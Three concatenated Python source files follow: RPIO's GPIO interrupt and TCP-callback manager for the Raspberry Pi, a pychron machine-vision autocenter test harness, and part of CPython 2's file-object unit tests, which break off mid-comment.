def _threaded_callback(callback, *args):
"""
Internal wrapper to start a callback in threaded mode. Using the
daemon mode to not block the main thread from exiting.
"""
t = Thread(target=callback, args=args)
t.daemon = True
t.start()
def exit_handler():
""" Auto-cleanup on exit """
RPIO.stop_waiting_for_interrupts()
RPIO.cleanup_interrupts()
atexit.register(exit_handler)
class Interruptor:
"""
Object-based wrapper for interrupt management.
"""
_epoll = select.epoll()
_show_warnings = True
# Interrupt callback maps
_map_fileno_to_file = {}
_map_fileno_to_gpioid = {}
_map_fileno_to_options = {}
_map_gpioid_to_fileno = {}
_map_gpioid_to_callbacks = {}
# Keep track of created kernel interfaces for later cleanup
_gpio_kernel_interfaces_created = []
# TCP socket stuff
_tcp_client_sockets = {} # { fileno: (socket, cb) }
_tcp_server_sockets = {} # { fileno: (socket, cb) }
# Whether to continue the epoll loop or quit at next chance. You
# can manually set this to False to stop `wait_for_interrupts()`.
_is_waiting_for_interrupts = False
def add_tcp_callback(self, port, callback, threaded_callback=False):
"""
Adds a TCP socket server callback, which will be invoked when values
arrive from a connected socket client. The callback must accept two
parameters, eg. ``def callback(socket, msg)``.
"""
if not callback:
raise AttributeError("No callback")
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind((_TCP_SOCKET_HOST, port))
serversocket.listen(1)
serversocket.setblocking(0)
self._epoll.register(serversocket.fileno(), select.EPOLLIN)
# Prepare the callback (wrap in Thread if needed)
cb = callback if not threaded_callback else \
partial(_threaded_callback, callback)
self._tcp_server_sockets[serversocket.fileno()] = (serversocket, cb)
debug("Socket server started at port %s and callback added." % port)
def add_interrupt_callback(self, gpio_id, callback, edge='both',
pull_up_down=_GPIO.PUD_OFF, threaded_callback=False,
debounce_timeout_ms=None):
"""
Add a callback to be executed when the value on 'gpio_id' changes to
the edge specified via the 'edge' parameter (default='both').
`pull_up_down` can be set to `RPIO.PUD_UP`, `RPIO.PUD_DOWN`, and
`RPIO.PUD_OFF`.
If `threaded_callback` is True, the callback will be started
inside a Thread.
"""
gpio_id = _GPIO.channel_to_gpio(gpio_id)
debug("Adding callback for GPIO %s" % gpio_id)
if edge not in ["falling", "rising", "both", "none"]:
raise AttributeError("'%s' is not a valid edge." % edge)
if pull_up_down not in [_GPIO.PUD_UP, _GPIO.PUD_DOWN, _GPIO.PUD_OFF]:
raise AttributeError("'%s' is not a valid pull_up_down." % pull_up_down)
# Make sure the gpio_id is valid
if gpio_id not in set(chain(RPIO.GPIO_LIST_R1, RPIO.GPIO_LIST_R2, \
RPIO.GPIO_LIST_R3)):
raise AttributeError("GPIO %s is not a valid gpio-id." % gpio_id)
# Require INPUT pin setup; and set the correct PULL_UPDN
if RPIO.gpio_function(int(gpio_id)) == RPIO.IN:
RPIO.set_pullupdn(gpio_id, pull_up_down)
else:
debug("- changing gpio function from %s to INPUT" % \
(GPIO_FUNCTIONS[RPIO.gpio_function(int(gpio_id))]))
RPIO.setup(gpio_id, RPIO.IN, pull_up_down)
# Prepare the callback (wrap in Thread if needed)
cb = callback if not threaded_callback else \
partial(_threaded_callback, callback)
# Prepare the /sys/class path of this gpio
path_gpio = "%sgpio%s/" % (_SYS_GPIO_ROOT, gpio_id)
# If initial callback for this GPIO then set everything up. Else make
# sure the edge detection is the same.
if gpio_id in self._map_gpioid_to_callbacks:
with open(path_gpio + "edge", "r") as f:
e = f.read().strip()
if e != edge:
raise AttributeError(("Cannot add callback for gpio %s:"
" edge detection '%s' not compatible with existing"
" edge detection '%s'.") % (gpio_id, edge, e))
# Check whether edge is the same, else throw Exception
debug("- kernel interface already setup for GPIO %s" % gpio_id)
self._map_gpioid_to_callbacks[gpio_id].append(cb)
else:
# If kernel interface already exists unexport first for clean setup
if os.path.exists(path_gpio):
if self._show_warnings:
warn("Kernel interface for GPIO %s already exists." % \
gpio_id)
debug("- unexporting kernel interface for GPIO %s" % gpio_id)
with open(_SYS_GPIO_ROOT + "unexport", "w") as f:
f.write("%s" % gpio_id)
time.sleep(0.1)
# Export kernel interface /sys/class/gpio/gpioN
with open(_SYS_GPIO_ROOT + "export", "w") as f:
f.write("%s" % gpio_id)
self._gpio_kernel_interfaces_created.append(gpio_id)
debug("- kernel interface exported for GPIO %s" % gpio_id)
# Configure gpio as input
with open(path_gpio + "direction", "w") as f:
f.write("in")
# Configure gpio edge detection
with open(path_gpio + "edge", "w") as f:
f.write(edge)
debug(("- kernel interface configured for GPIO %s "
"(edge='%s', pullupdn=%s)") % (gpio_id, edge, \
_PULL_UPDN[pull_up_down]))
# Open the gpio value stream and read the initial value
f = open(path_gpio + "value", 'r')
val_initial = f.read().strip()
debug("- inital gpio value: %s" % val_initial)
f.seek(0)
# Add callback info to the mapping dictionaries
self._map_fileno_to_file[f.fileno()] = f
self._map_fileno_to_gpioid[f.fileno()] = gpio_id
self._map_fileno_to_options[f.fileno()] = {
"debounce_timeout_s": debounce_timeout_ms / 1000.0 if \
debounce_timeout_ms else 0,
"interrupt_last": 0,
"edge": edge
}
self._map_gpioid_to_fileno[gpio_id] = f.fileno()
self._map_gpioid_to_callbacks[gpio_id] = [cb]
# Add to epoll
self._epoll.register(f.fileno(), select.EPOLLPRI | select.EPOLLERR)
def del_interrupt_callback(self, gpio_id):
""" Delete all interrupt callbacks from a certain gpio """
debug("- removing interrupts on gpio %s" % gpio_id)
gpio_id = _GPIO.channel_to_gpio(gpio_id)
fileno = self._map_gpioid_to_fileno[gpio_id]
# 1. Remove from epoll
self._epoll.unregister(fileno)
# 2. Cache the file
f = self._map_fileno_to_file[fileno]
# 3. Remove from maps
del self._map_fileno_to_file[fileno]
del self._map_fileno_to_gpioid[fileno]
del self._map_fileno_to_options[fileno]
del self._map_gpioid_to_fileno[gpio_id]
del self._map_gpioid_to_callbacks[gpio_id]
# 4. Close file last in case of IOError
f.close()
def _handle_interrupt(self, fileno, val):
""" Internally distributes interrupts to all attached callbacks """
val = int(val)
# Filter invalid edge values (sometimes 1 comes in when edge=falling)
edge = self._map_fileno_to_options[fileno]["edge"]
if (edge == 'rising' and val == 0) or (edge == 'falling' and val == 1):
return
# If user activated debounce for this callback, check timing now
debounce = self._map_fileno_to_options[fileno]["debounce_timeout_s"]
if debounce:
t = time.time()
t_last = self._map_fileno_to_options[fileno]["interrupt_last"]
if t - t_last < debounce:
debug("- don't start interrupt callback due to debouncing")
return
self._map_fileno_to_options[fileno]["interrupt_last"] = t
# Start the callback(s) now
gpio_id = self._map_fileno_to_gpioid[fileno]
if gpio_id in self._map_gpioid_to_callbacks:
for cb in self._map_gpioid_to_callbacks[gpio_id]:
cb(gpio_id, val)
def close_tcp_client(self, fileno):
debug("closing client socket fd %s" % fileno)
self._epoll.unregister(fileno)
socket, cb = self._tcp_client_sockets[fileno]
socket.close()
del self._tcp_client_sockets[fileno]
def wait_for_interrupts(self, epoll_timeout=1):
"""
Blocking loop to listen for GPIO interrupts and distribute them to
associated callbacks. epoll_timeout is an easy way to shut down the
blocking function. By default the timeout is set to 1 second; if
`_is_waiting_for_interrupts` is set to False the loop will exit.
If an exception occurs while waiting for interrupts, the interrupt
gpio interfaces will be cleaned up (/sys/class/gpio unexports). In
this case all interrupts will be reset and you'd need to add the
callbacks again before using `wait_for_interrupts(..)` again.
"""
self._is_waiting_for_interrupts = True
while self._is_waiting_for_interrupts:
events = self._epoll.poll(epoll_timeout)
for fileno, event in events:
debug("- epoll event on fd %s: %s" % (fileno, event))
if fileno in self._tcp_server_sockets:
# New client connection to socket server
serversocket, cb = self._tcp_server_sockets[fileno]
connection, address = serversocket.accept()
connection.setblocking(0)
f = connection.fileno()
self._epoll.register(f, select.EPOLLIN)
self._tcp_client_sockets[f] = (connection, cb)
elif event & select.EPOLLIN:
# Input from TCP socket
socket, cb = self._tcp_client_sockets[fileno]
content = socket.recv(1024)
if not content or not content.strip():
# No content means quitting
self.close_tcp_client(fileno)
else:
sock, cb = self._tcp_client_sockets[fileno]
cb(self._tcp_client_sockets[fileno][0], \
content.strip())
elif event & select.EPOLLHUP:
# TCP Socket Hangup
self.close_tcp_client(fileno)
elif event & select.EPOLLPRI:
# GPIO interrupts
f = self._map_fileno_to_file[fileno]
# read() is workaround for not getting new values
# with read(1)
val = f.read().strip()
f.seek(0)
self._handle_interrupt(fileno, val)
def stop_waiting_for_interrupts(self):
"""
Ends the blocking `wait_for_interrupts()` loop the next time it can,
which depends on the `epoll_timeout` (by default it's 1 second).
"""
self._is_waiting_for_interrupts = False
def cleanup_interfaces(self):
"""
Removes all /sys/class/gpio/gpioN interfaces that this script created,
and deletes callback bindings. Should be used after using interrupts.
"""
debug("Cleaning up interfaces...")
for gpio_id in self._gpio_kernel_interfaces_created:
# Close the value-file and remove interrupt bindings
self.del_interrupt_callback(gpio_id)
# Remove the kernel GPIO interface
debug("- unexporting GPIO %s" % gpio_id)
with open(_SYS_GPIO_ROOT + "unexport", "w") as f:
f.write("%s" % gpio_id)
# Reset list of created interfaces
self._gpio_kernel_interfaces_created = []
def cleanup_tcpsockets(self):
"""
Closes all TCP connections and then the socket servers
"""
# Copy the keys: close_tcp_client() removes entries while we iterate
for fileno in list(self._tcp_client_sockets.keys()):
self.close_tcp_client(fileno)
for fileno, items in self._tcp_server_sockets.items():
socket, cb = items
debug("- _cleanup server socket connection (fd %s)" % fileno)
self._epoll.unregister(fileno)
socket.close()
self._tcp_server_sockets = {}
def cleanup_interrupts(self):
"""
Clean up all interrupt-related sockets and interfaces. Recommended to
use before exiting your program! After this you'll need to re-add the
interrupt callbacks before waiting for interrupts again.
"""
self.cleanup_tcpsockets()
self.cleanup_interfaces()
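# Illustrative usage sketch (assumptions: running on a Raspberry Pi with the RPIO
# C extension available; GPIO 17 is an arbitrary example pin). Interrupt callbacks
# receive (gpio_id, value), matching the cb(gpio_id, val) dispatch in
# _handle_interrupt() above.
#
# def on_edge(gpio_id, value):
#     debug("gpio %s changed to %s" % (gpio_id, value))
#
# intr = Interruptor()
# intr.add_interrupt_callback(17, on_edge, edge='both',
#                             debounce_timeout_ms=50, threaded_callback=True)
# try:
#     intr.wait_for_interrupts()
# finally:
#     intr.cleanup_interrupts()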
|
mv_manager_tester.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from numpy import copy
from pyface.timer.do_later import do_later
from traits.api import Button, HasTraits
from traitsui.api import View, UItem
# from pychron.mv.machine_vision_manager import MachineVisionManager
# from pychron.mv.mv_image import MVImage
# ============= standard library imports ========================
# ============= local library imports ==========================
from traits.api import Instance
from pychron.core.helpers.logger_setup import logging_setup
from pychron.core.ui.image_editor import ImageEditor
from pychron.core.ui.thread import Thread
from pychron.image.standalone_image import FrameImage
from pychron.image.video import Video
from pychron.mv.autocenter_manager import CO2AutocenterManager
from pychron.mv.lumen_detector import LumenDetector
class TestAutocenter(HasTraits):
test1_button = Button('Test1')
display_image = Instance(FrameImage)
def init(self):
a = CO2AutocenterManager(video=Video())
# a.search_width = 1
# a.search_n = 20
# a.stretch_intensity = False
# a.blur = True
# a.blocksize = 10
# a.blocksize_step = 5
self.display_image = a.display_image
self.manager = a
def _test1(self):
print('test1')
ld = LumenDetector()
def func():
src = copy(self.manager.video.get_cached_frame())
# dim = self.stage_map.g_dimension
ld.pxpermm = 31
dim = 1.5
mask_dim = dim * 1.05
offx, offy = 0, 0
cropdim = dim * 2.5
src = ld.crop(src, cropdim, cropdim, offx, offy, verbose=False)
ld.find_targets(self.display_image, src, dim, mask=mask_dim,
search={'start_offset_scalar': 1,
# 'width': 2
})
# self.manager.calculate_new_center(0, 0, 0, 0, dim=1.25)
t = Thread(target=func)
t.start()
self.t = t
def _set_test_image(self):
from pychron.globals import globalv
# p = '/Users/ross/Sandbox/test_target.jpg'
# p = '/Users/ross/Sandbox/pos_err/pos_err_200_0-002.jpg'
p = '/Users/ross/Sandbox/poserror/pos_err_221_0-007.jpg'
p = '/Users/ross/Sandbox/poserror/snapshot009.jpg'
p = '/Users/ross/Sandbox/graintest/image0269.png'
# p = '/Users/argonlab3/Pychron_co2/data/snapshots/pos_err_220_0--001.jpg'
globalv.video_test_path = p
globalv.video_test = True
def _test1_button_fired(self):
self._set_test_image()
self._test1()
if __name__ == '__main__':
logging_setup('mv', use_archiver=False, use_file=False)
t = TestAutocenter()
t.init()
t.configure_traits(view=View(UItem('test1_button'),
UItem('object.display_image.source_frame',
width=254, height=254,
editor=ImageEditor(refresh='object.display_image.refresh_needed')),
width=500, height=300))
# ============= EOF =============================================
# class TestMVManager(MachineVisionManager):
# step = Button
# test_image = Instance(MVImage, ())
#
# def _step_fired(self):
# self.step_signal.set()
#
# def traits_view(self):
# return View(Item('test'),
# Item('step'),
# Item('test_image', show_label=False,
# style='custom'),
# resizable=True
# )
#
# def _test_fired(self):
# from pychron.globals import globalv
#
# p = '/Users/ross/Sandbox/test_target.jpg'
# # p = '/Users/ross/Sandbox/pos_err/pos_err_200_0-002.jpg'
# p = '/Users/ross/Sandbox/poserror/pos_err_221_0-007.jpg'
# # p = '/Users/ross/Sandbox/poserror/snapshot009.jpg'
# # force video to reload test image
# self.video.source_frame = None
# globalv.video_test_path = p
#
# im = self.setup_image()
#
# # self._test2(im)
# from pychron.core.ui.thread import Thread
# t = Thread(target=self._test2, args=(im,))
# t.start()
# self._t = t
#
# # ===============================================================================
# # tests
# # ===============================================================================
# def _test(self, im):
#
# paths = (
# # ('/Users/ross/Sandbox/pos_err/snapshot007.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-005.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_207_0-002.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_209_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_210_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_220_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-002.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-003.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_221_0-004.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_200_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_200_0-002.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_201_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_202_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_203_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_204_0-001.jpg', 1.25),
# ('/Users/ross/Sandbox/pos_err/pos_err_206_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_206_1-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_207_0-001.jpg', 1.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_52001.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_52001.tiff', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_52002.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_53001.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_53002.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_53003.jpg', 2.25),
# # ('/Users/ross/Sandbox/pos_err/pos_err_54001.jpg', 2.25),
# )
# fails = 0
# times = []
#
# # im = self.target_image
# for p, dim in paths[:]:
# from pychron.globals import globalv
# # force video to reload test image
# self.video.source_frame = None
# globalv.video_test_path = p
# # return
# # im.source_frame = self.new_image_frame()
# frm = self.new_image_frame()
# # self.target_image.load()
#
# cw = ch = dim * 3.2
# # cw = ch = dim
# frame = self._crop_image(frm, cw, ch)
# im.source_frame = frame
# # time.sleep(1)
# # continue
# # self.target_image.set_frame(0, frame)
#
# # loc.pxpermm = self.cpxpermm
#
# # loc.croppixels = (cw * self.pxpermm, ch * self.pxpermm)
#
# loc = self.new_co2_locator()
#
# st = time.time()
# dx, dy = loc.find(im, frame, dim * self.pxpermm)
#
# times.append(time.time() - st)
# if dx and dy:
# self.info('SUCCESS path={}'.format(p))
# self.info('calculated deviation {:0.3f},{:0.3f}'.format(dx, dy))
# else:
# fails += 1
# self.info('FAIL path={}'.format(p))
# time.sleep(1)
#
# if times:
# n = len(paths)
# self.info('failed to find center {}/{} times'.format(fails, n))
# self.info('execution times: min={} max={} avg={}'.format(min(times), max(times), sum(times) / n))
#
# # def foo():
# # from pylab import show, plot
# # plot(times)
# # show()
# # do_later(foo)
#
# def _test2(self, im):
#
# dim = 1.0
#
# frame = self.new_image_frame()
#
# cw = ch = dim * 3.2
#
# frame = self._crop_image(frame, cw, ch)
# # print frame
# # im.source_frame = frame
# loc = self.new_co2_locator()
# from threading import Event
# evt = Event()
# self.step_signal = evt
# loc.step_signal = evt
# loc.test_image = self.test_image
#
# dx, dy = loc.find(im, frame, dim * self.pxpermm)
# # print dx, dy
# def setup_image(self):
# frame = self.new_image_frame()
# im = self.new_image(frame)
# self.view_image(im)
# return im
#
# def test1():
# from pychron.image.video import Video
# from pychron.globals import globalv
# globalv.video_test = True
# globalv.video_test_path = '/Users/ross/Sandbox/pos_err/snapshot007.jpg'
# # globalv.video_test_path = '/Users/ross/Sandbox/pos_err/pos_err_53002.jpg'
# globalv.video_test_path = '/Users/ross/Sandbox/pos_err/pos_err_221_0-005.jpg'
#
# # globalv.video_test_path = '/Users/ross/Sandbox/pos_err/diodefailsnapshot.jpg'
# video = Video()
# video.open()
# mv = MachineVisionManager(video=video)
# mv.configure_traits()
#
#
# if __name__ == '__main__':
# from pychron.core.helpers.logger_setup import logging_setup
# logging_setup('mv')
# test()
|
test_file2k.py
|
import sys
import os
import unittest
import itertools
import time
from array import array
from weakref import proxy
try:
import threading
except ImportError:
threading = None
from test import test_support
from test.test_support import TESTFN, run_unittest
from UserList import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write('teststring')
self.assertEquals(self.f.tell(), p.tell())
self.f.close()
self.f = None
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testAttributes(self):
# verify expected attributes exist
f = self.f
with test_support.check_py3k_warnings():
softspace = f.softspace
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
with test_support.check_py3k_warnings():
# verify softspace is writable
f.softspace = softspace # merely shouldn't blow up
# verify the others aren't
for attr in 'name', 'mode', 'closed':
self.assertRaises((AttributeError, TypeError), setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write('12')
self.f.close()
a = array('c', 'x'*10)
self.f = open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEquals('12', a.tostring()[:n])
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList(['1', '2'])
self.f.writelines(l)
self.f.close()
self.f = open(TESTFN, 'rb')
buf = self.f.read()
self.assertEquals(buf, '12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1,2,3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
def testRepr(self):
# verify repr works
self.assertTrue(repr(self.f).startswith("<open file '" + TESTFN))
def testErrors(self):
self.f.close()
self.f = open(TESTFN, 'rb')
f = self.f
self.assertEquals(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
self.assertRaises(TypeError, f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'flush', 'isatty', 'next', 'read', 'readinto',
'readline', 'readlines', 'seek', 'tell', 'truncate',
'write', '__iter__']
deprecated_methods = ['xreadlines']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises(ValueError, method)
with test_support.check_py3k_warnings():
for methodname in deprecated_methods:
method = getattr(self.f, methodname)
self.assertRaises(ValueError, method)
self.assertRaises(ValueError, self.f.writelines, [])
# file is closed, __exit__ shouldn't do anything
self.assertEquals(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1 // 0
except:
self.assertEquals(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
def testIssue5677(self):
# Remark: Do not perform more than one test per open file,
# since that does NOT catch the readline error on Windows.
data = 'xxx'
for mode in ['w', 'wb', 'a', 'ab']:
for attr in ['read', 'readline', 'readlines']:
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, getattr(self.f, attr))
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, lambda: [line for line in self.f])
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, self.f.readinto, bytearray(len(data)))
self.f.close()
for mode in ['r', 'rb', 'U', 'Ub', 'Ur', 'rU', 'rbU', 'rUb']:
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.write, data)
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.writelines, [data, data])
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.truncate)
self.f.close()
class OtherFileTests(unittest.TestCase):
def testOpenDir(self):
this_dir = os.path.dirname(__file__)
for mode in (None, "w"):
try:
if mode:
f = open(this_dir, mode)
else:
f = open(this_dir)
except IOError as e:
self.assertEqual(e.filename, this_dir)
else:
self.fail("opening a directory didn't raise an IOError")
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
f = open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
# Some invalid modes fail on Windows, but pass on Unix
# Issue3965: avoid a crash on Windows when filename is unicode
for name in (TESTFN, unicode(TESTFN), unicode(TESTFN + '\t')):
try:
f = open(name, "rr")
except (IOError, ValueError):
pass
else:
f.close()
def testStdin(self):
# This causes the interpreter to exit on OSF1 v5.1.
if sys.platform != 'osf1V5':
self.assertRaises(IOError, sys.stdin.seek, -1)
else:
print >>sys.__stdout__, (
' Skipping sys.stdin.seek(-1), it may crash the interpreter.'
' Test manually.')
self.assertRaises(IOError, sys.stdin.truncate)
def testUnicodeOpen(self):
# verify repr works for unicode too
f = open(unicode(TESTFN), "w")
self.assertTrue(repr(f).startswith("<open file u'" + TESTFN))
f.close()
os.unlink(TESTFN)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = open(TESTFN, bad_mode)
except ValueError, msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may
# be no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
f = open(TESTFN, 'w', s)
f.write(str(s))
f.close()
f.close()
f = open(TESTFN, 'r', s)
d = int(f.read())
f.close()
f.close()
except IOError, msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEquals(d, s)
def testTruncateOnWindows(self):
os.unlink(TESTFN)
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
f = open(TESTFN, 'wb')
f.write('12345678901') # 11 bytes
f.close()
f = open(TESTFN,'rb+')
data = f.read(5)
if data != '12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods. Ostensibly, the mixture could just be tested
# to work when it should work according to the Python language,
# instead of fail when it should fail according to the current CPython
# implementation. People don't always program Python the way they
# should, though, and the implementation might change in subtle ways,
# so we explicitly test for errors, too; the test will just have to
# be updated when the implementation changes.
dataoffset = 16384
filler = "ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
"spam, spam and eggs\n",
"eggs, spam, ham and spam\n",
"saussages, spam, spam and eggs\n",
"spam, ham, spam and eggs\n",
"spam, spam, spam, spam, spam, ham, spam\n",
"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("c", " "*100),))]
try:
# Prepare the testfile
bag = open(TESTFN, "w")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
f = open(TESTFN)
if f.next() != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
try:
meth(*args)
except ValueError:
pass
else:
self.fail("%s%r after next() didn't raise ValueError" %
(methodname, args))
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
f = open(TESTFN)
for i in range(nchunks):
f.next()
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("c", "\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tostring()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
# Reading after iteration hit EOF shouldn't hurt either
f = open(TESTFN)
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
class FileSubclassTests(unittest.TestCase):
def testExit(self):
# test that exiting with context calls subclass' close
class C(file):
def __init__(self, *args):
self.subclass_closed = False
file.__init__(self, *args)
def close(self):
self.subclass_closed = True
file.close(self)
with C(TESTFN, 'w') as f:
pass
self.assertTrue(f.subclass_closed)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FileThreadingTests(unittest.TestCase):
# These tests check the ability to call various methods of file objects
# (including close()) concurrently without crashing the Python interpreter.
# See #815646, #595601
def setUp(self):
self._threads = test_support.threading_setup()
self.f = None
self.filename = TESTFN
with open(self.filename, "w") as f:
f.write("\n".join("0123456789"))
self._count_lock = threading.Lock()
self.close_count = 0
self.close_success_count = 0
self.use_buffering = False
def tearDown(self):
if self.f:
try:
self.f.close()
except (EnvironmentError, ValueError):
pass
try:
os.remove(self.filename)
except EnvironmentError:
pass
test_support.threading_cleanup(*self._threads)
def _create_file(self):
if self.use_buffering:
self.f = open(self.filename, "w+", buffering=1024*16)
else:
self.f = open(self.filename, "w+")
def _close_file(self):
with self._count_lock:
self.close_count += 1
self.f.close()
with self._count_lock:
self.close_success_count += 1
def _close_and_reopen_file(self):
self._close_file()
# if close raises an exception that's fine; self.f remains valid so
# we don't need to reopen.
self._create_file()
def _run_workers(self, func, nb_workers, duration=0.2):
with self._count_lock:
self.close_count = 0
self.close_success_count = 0
self.do_continue = True
threads = []
try:
for i in range(nb_workers):
t = threading.Thread(target=func)
t.start()
threads.append(t)
for _ in xrange(100):
time.sleep(duration/100)
with self._count_lock:
if self.close_count-self.close_success_count > nb_workers+1:
if test_support.verbose:
print 'Q',
break
time.sleep(duration)
finally:
self.do_continue = False
for t in threads:
t.join()
def _test_close_open_io(self, io_func, nb_workers=5):
def worker():
self._create_file()
funcs = itertools.cycle((
lambda: io_func(),
lambda: self._close_and_reopen_file(),
))
for f in funcs:
if not self.do_continue:
break
try:
f()
except (IOError, ValueError):
pass
self._run_workers(worker, nb_workers)
if test_support.verbose:
# Useful verbose statistics when tuning this test to take
# less time to run while still ensuring that it's useful.
#
# the percent of close calls that raised an error
